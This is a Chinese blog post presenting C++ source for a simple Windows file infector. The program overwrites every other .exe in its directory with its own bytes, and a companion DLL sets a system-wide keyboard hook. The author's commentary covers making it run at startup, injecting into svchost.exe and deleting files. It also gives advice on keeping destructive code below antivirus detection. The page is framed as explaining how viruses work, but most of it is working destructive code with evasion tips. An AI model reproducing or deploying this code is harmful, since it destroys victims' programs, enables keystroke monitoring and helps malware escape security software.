病毒原理实例

最新推荐文章于 2023-05-17 19:45:05 发布
最新推荐文章于 2023-05-17 19:45:05 发布
阅读量1.4k 收藏 4
点赞数
分类专栏: 操作系统 文章标签: 病毒 病毒原理 C++病毒原理
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dssdss123/article/details/8710560
版权 
#include <iostream>
#include <windows.h>
#include <errno.h>
using namespace std;

HMODULE g_hModule = NULL;

// 感染同目录下的exe
void Infection()
{
	// 把自己打开,准备感染
	char szFullFileName[MAX_PATH] = "";
	GetModuleFileName(NULL, szFullFileName, sizeof(szFullFileName) / sizeof(char));
	char szFileName[64] = "";
	const char *pChr = strrchr(szFullFileName, '\\');
	if (!pChr)
	{
		return ;
	}
	strcpy_s(szFileName, sizeof(szFileName), pChr + 1);
	FILE *pSelfFile = NULL;

	errno_t err = fopen_s(&pSelfFile, szFullFileName, "rb");
	if (err)
	{
		cerr << err << endl;
		return ;
	}

	fseek(pSelfFile, 0, SEEK_END);
	int nMySize = ftell(pSelfFile);
	fseek(pSelfFile, 0, SEEK_SET);

	// 把自己读入内存
	char *pszMySelf = new char[nMySize];
	if (!pszMySelf)
	{
		fclose(pSelfFile);
		return ;
	}
	memset(pszMySelf, 0, nMySize);
	fread(pszMySelf, nMySize / 10, 10, pSelfFile);

	// 取当前目录,准备搜索
	char szDir[MAX_PATH] = "";
	GetCurrentDirectory(sizeof(szDir) / sizeof(char), szDir);

	char szSearchFile[MAX_PATH] = "";
	strcpy_s(szSearchFile, sizeof(szSearchFile), szDir);
	strcat_s(szSearchFile, sizeof(szSearchFile), "\\*");

	WIN32_FIND_DATA fd;
	memset(&fd, 0, sizeof(WIN32_FIND_DATA));

	HANDLE hFile = FindFirstFile(szSearchFile, &fd);
	if (hFile == INVALID_HANDLE_VALUE)
	{
		cerr << GetLastError() << endl;
		fclose(pSelfFile);
		return ;
	}

	// 循环读取exe文件,开始感染
	while(TRUE)
	{
		if (FALSE == FindNextFile(hFile, &fd))
		{
			break;
		}

		if (strcmp(fd.cFileName, szFileName) == 0)
		{
			continue ;
		}

		if (strstr(fd.cFileName, ".exe") != NULL)
		{
			char szDstFileFullPath[MAX_PATH] = "";
			strcpy_s(szDstFileFullPath, sizeof(szDstFileFullPath), szDir);
			strcat_s(szDstFileFullPath, sizeof(szDstFileFullPath), "\\");
			strcat_s(szDstFileFullPath, sizeof(szDstFileFullPath), fd.cFileName);

			FILE *pFile = NULL;
			fopen_s(&pFile, szDstFileFullPath, "r+b");
			fseek(pFile, 0, SEEK_SET);
			fwrite(pszMySelf, nMySize / 10, 10, pFile);
			fclose(pFile);

			cout << "已感染文件:" << szDstFileFullPath << endl;
		}
		else
		{
//			remove(fd.cFileName);
		}
	}

	fclose(pSelfFile);
	delete []pszMySelf;
}

void CreateKeyboardHook()
{
	g_hModule = LoadLibrary("Hook.dll");
	if (!g_hModule)
	{
		return ;
	}

	typedef void (*HookFunc)();
	HookFunc myHookFunc = (HookFunc)GetProcAddress(g_hModule, "SetHook");
	if (!myHookFunc)
	{
		FreeLibrary(g_hModule);
		return ;
	}
	myHookFunc();
}

int main()
{
	Infection();
	CreateKeyboardHook();

	system("pause");

	typedef void (*UnHookFunc)();
	UnHookFunc unHookFunc = (UnHookFunc)GetProcAddress(g_hModule, "UnHook");
	if (!unHookFunc)
	{
		FreeLibrary(g_hModule);
		return 1;
	}
	unHookFunc();

	FreeLibrary(g_hModule);

	return 0;
}
#include <windows.h>

extern "C" _declspec(dllexport) void SetHook();
extern "C" _declspec(dllexport) void UnHook();

HHOOK g_KeyBoardHook = NULL;

LRESULT CALLBACK KeyBoardHook(int nCode, WPARAM wParam, LPARAM lParam)
{
	if (49 == wParam)
	{
		wParam = 50;
		::MessageBox(NULL, "你按了A,我帮你改成B", "关掉吧", MB_OK);
		return CallNextHookEx(g_KeyBoardHook, nCode, wParam, lParam);
	}
	else if (0 == wParam)
	{
		UnhookWindowsHookEx(g_KeyBoardHook);
	}
	return 1;
}

void SetHook()
{
	g_KeyBoardHook = SetWindowsHookEx(WH_KEYBOARD, KeyBoardHook, GetModuleHandle("Hook"), 0);
}

void UnHook()
{
	UnhookWindowsHookEx(g_KeyBoardHook);
}

以上两个程序只是为了说明病毒的原理,其实,这只算是一段恶意的代码,第一段代码是主程序,编译成exe,第二段代码是dll文件,先编译一下dll文件,把lib文件放到主程序运行目录下,把dll文件放到病毒程序运行目录下,就可以了

1、病毒若想要自动运行,很简单,只要把我们的exe放入开始菜单的启动项就可以了,每次开机都会自动运行,如果高级点的话,就注入到别的进程里去吧,如svchost.exe,具体实现,下次有时间再讲解。

2、病毒感染,这是个很简单的过程,就是打开目标文件,把病毒文件一个字节一个字节的读出来,然后写入到目标文件,这样,目标文件就拥有与病毒文件相同的功能,也就是,如果目标是*.exe文件,那么,目标文件运行后也会跟源病毒文件做相同的事

3、病毒破坏作用,这个也很简单,想破坏个东西还不容易吗,删除文件就属于破坏行为了。如果想监控客户机,就安装个钩子吧,就像上面的代码一样,安装了个键盘钩子。

4、现在的计算机都安装有杀毒软件,想要入侵怎么办?最简单的办法,就是写个简单的破坏软件(这种软件杀毒软件不会报,杀毒软件是个苦差啊,有些是不能报的),就像上面的那两段代码,去掉钩子,杀毒软件就不会报了,接下来,就是简单的破坏了,只要不是写注册表,不安装钩子,不自动运行,杀软一般都不会报,当然,这也是去了病毒程序最好玩的地方

dssdss123
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
病毒原理(概述)
09-19
计算机病毒的特性、工作机理等都有比较详细的描述。对于反病毒学习入门有些帮助。放在手机上随时学习。
病毒原理
why
06-20 1598
<br />首先我似乎该介绍下什么叫做病毒,因为很多人现在总是把病毒和木马混为一谈,不-这也不能怪他们,因为现在很多木马也采用了病毒相关的技术, 所以也就没有了木马病毒之分。病毒是指编制或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码。但是它没有任何窃取相关个人信息的功能,这和木马是有差别的。很久以前vxer(病毒作者)被成为“天才的程序员”,他们以编写完美、精巧严谨、传播、隐藏、对抗思路新颖的病毒代码为目的。但现在已经没有vxer了,现在的病毒
病毒原理
每天进步一点点
10-07 900
http://www2.beareyes.com.cn/bbs/2/164.htm 
病毒程序源码实例剖析-“主页”病毒[1]
蓄势待发
07-19 1148
 随着 Internet 的迅猛发展,电子邮件已经成为人们相互交流最常使用的工具,于是它也成为新型病毒——电子邮件型病毒的重要载体。最近一两年,出现了许多危害极大的邮件型病毒,如 “爱虫”病毒、“美丽莎”病毒、“库尔尼科娃”病毒、“Naked Wife” 病毒以及 Homepage 病毒等,这些病毒专挑 Windows平台上应用最普遍的邮件客户端——Microsoft  Outlook 下手,其发
ms-dos u盘病毒实例
03-30
MS-DOS U盘病毒实例详解 MS-DOS操作系统在个人计算机早期阶段占据主导地位,而U盘病毒在那个时期也开始显现。这些病毒主要利用了DOS系统中的某些漏洞和用户不安全的操作习惯来传播。本篇文章将深入探讨MS-DOS U盘...
VB病毒编程实例(用VB编写病毒
05-19
【VB病毒编程实例】 在信息技术领域,VB(Visual Basic)是一种广泛应用的编程语言,由微软公司开发,以其直观易学的语法和强大的Windows应用程序开发能力而著名。然而,不幸的是,这种灵活性也被某些不法分子利用...
arp欺骗病毒排查实例.pdf
09-17
arp欺骗病毒排查实例,ARP的工作原理,和防范方法
VB模拟EXE感染-病毒防范实例
05-02
【VB模拟EXE感染-病毒防范实例】 在计算机科学领域,病毒防范是至关重要的一个环节,尤其是在编程中。VB(Visual Basic)是一种流行的编程语言,它以其易学性和灵活性受到许多开发者的喜爱。然而,由于VB可以编写可...
计算机病毒与防护:MSTP基本原理.pptx
06-10
【计算机病毒与防护:MSTP基本原理】 在IT领域,计算机病毒的防护是一项至关重要的任务,而MSTP(Multiple Spanning Tree Protocol,多生成树协议)则是网络设计中的关键部分,它解决了传统STP(Single Spanning ...
病毒原理【自己编写】
07-01
病毒原理【自己编写】
手工删除计算机病毒原理及步骤
01-15
随着计算机的普及,计算机已融入了我们的日常生活,然而计算机病毒让我们胆颤心惊,其时时刻刻危害着计算机的安全;我们因掌握删除计算机病毒的方法,以减少我们的损失,通过对威金病毒、恶邮差病毒、MSN圣诞照片变种B(Backdoor.Win32.PBot.b)的手工删除来学习掌握手工删除计算机病毒的方法。并了解病毒的本质、构成以及运行原理,了解一些与病毒相关的一些知识。 关键字:计算机病毒 威金病毒 恶邮差病毒 MSN圣诞照片变种B(Backdoor.Win32.PBot.b)手工杀毒
病毒程序源码实例剖析-“主页”病毒[2]
蓄势待发
07-19 782
  --开始搞破坏,检索Outlook收件箱,将其中主题为“Homepage”的邮件全部删除  --并将“已删除文件夹”清空,同时随机打开四个色情站点中的一个  --创建一个Outlook应用对象  Set s = CreateObject("Outlook.Application")   Set t = s.GetNameSpace("MAPI")   --获得“收件箱”文件夹对象  S
病毒原理与防范
weixin_46273733的博客
06-17 2095
病毒基本概念 计算机病毒的定义: 计算机病毒是计算机程序中被嵌入的一组破坏计算机功能或毁坏数据的计算机指令或者程序代码。 病毒对抗技术: 特征码扫描,启发式扫描,虚拟机技术,主动防御技术,自免疫技术 病毒生命周期: 开发期→传染期→潜伏期→发作期→发现期→消化期→消亡期 计算机病毒的分类: 按照计算机病毒的破坏情况分类 良性病毒:是不包含对计算机系统产生直接破坏作用的代码的计算机病毒。 恶性病毒:指在代码中包含有破坏计算机系统操作代码的计算机病毒。 按传播媒介来...
c语言制作电脑病毒原理,电脑病毒是什么及原理介绍
weixin_39583655的博客
05-22 454
病毒的最大特点就是自我复制,从病毒的分类来说有很多种,这里我们将介绍最流行的附加式,下面由学校啦小编给你做出详细的!希望对你有帮助!:电脑病毒是什么:病毒,它通过对正常的文件进行改写,增加来实现其自我复制的目的。从程序的角度来说,我们要做的事情有两件:1,让程序能够将自己在不影响其它程序本身工作的情况下复制给其它程序,使它具备继续复制的能力。2,在一定条件下使其产生某种发作效果。其实第一件事情实际...
Pytorch源码分析
天边一坨浮云
11-28 3289
目录 命名空间/类/方法/函数/变量 torch.autograd.Function中的ctx参数 DDP(DistributedDataParallel)的构造函数 torch.floor(input, out=None) nametuple argmax view函数 void c10::TensorImpl::refresh_contiguous void c10::TensorImpl::refresh_numel numel()函数 ExecutionStep Devi..
彩虹小猫病毒简介
2301_77934503的博客
05-17 4231
彩虹猫病毒最早出现于2019年,是一款MBR类型病毒,中招的用户MBR会被篡改重启后无法正常进入系统只会出现彩虹猫的动画。同时在中招之后用户的鼠标和键盘会间歇性失效,桌面不断出现弹窗并且出现负片效果 ,鼠标图标会被修改,发出错误提示的声音,诺通过任务管理器关闭MEMZ.exe进程桌面会出现大量弹窗,随后出现蓝屏。从功能上看,它是一款恶作剧病毒。该病毒会修改MBR主引导扇区,以此来破坏电脑的正常启动。在修改MBR后,电脑重启会停留在一个彩虹猫的画面,因此该病毒被称为是彩虹猫病毒
MEMZ彩虹猫病毒讲解
m0_70379664的博客
04-18 5108
MEMZ
勒索病毒工作原理
热门推荐
那些零零散散的算法
05-22 2万+
前些天借着Windows上的”永恒之蓝“漏洞,本来几乎快销声匿迹的加密勒索病毒又重新回到了公众视线里。由于电信等网络运营商早就封堵了可能导致中毒的445端口,所以外网影响不大,但是教育网里的同学就遭殃了,尤其是很多临毕业的学生纷纷中招,论文被加密,可能因此被迫延毕。 本文尝试着还原这些勒索病毒中文件加解密的原理,来了解为什么这些病毒这么难缠,并给出一些“破解”的可能性,虽然条件都比较苛刻。
关于计算机的病毒案例分析,实例解析蠕虫病毒原理 -电脑资料
最新发布
06-08
蠕虫病毒原理是利用计算机系统的漏洞或者弱口令等方式进行感染,然后自动复制并传播到其他计算机系统上。一旦蠕虫病毒成功感染了一台计算机系统,它就会在该系统上运行并尝试寻找其他可以感染的目标主机。蠕虫病毒...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值